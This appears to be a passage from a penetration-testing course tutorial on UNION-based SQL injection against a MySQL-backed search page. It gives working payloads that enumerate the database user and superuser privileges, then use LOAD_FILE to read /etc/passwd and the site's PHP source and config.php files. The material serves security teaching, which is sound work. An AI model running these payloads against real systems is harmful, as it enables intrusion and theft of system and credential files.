Reading Files
DB User
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
Our UNION
injection payload will be as follows:
cn' UNION SELECT 1, user(), 3, 4-- -
##or
cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -
Which tells us our current user, which in this case is root
:

User Privileges
SELECT super_priv FROM mysql.user
Once again, we can use the following payload with the above query:
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
If we had many users within the DBMS, we can add WHERE user="root"
to only show privileges for our current user root
:
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

The query returns Y
, which means YES
, indicating superuser privileges. We can also dump other privileges we have directly from the schema, with the following query:
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
From here, we can add WHERE grantee="'root'@'localhost'"
to only show our current user root
privileges. Our payload would be:
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
And we see all of the possible privileges given to our current user:

LOAD_FILE
SELECT LOAD_FILE('/etc/passwd');
Note: We will only be able to read the file if the OS user running MySQL has enough privileges to read it.
Similar to how we have been using a UNION
injection, we can use the above query:
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

Another Example
We know that the current page is search.php
. The default Apache webroot is /var/www/html
. Let us try reading the source code of the file at /var/www/html/search.php
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -

However, the page ends up rendering the HTML code within the browser. The HTML source can be viewed by hitting [Ctrl + U]
' UNION SELECT 1, load_file('/var/www/html/config.php'), 3, 4-- -

Last updated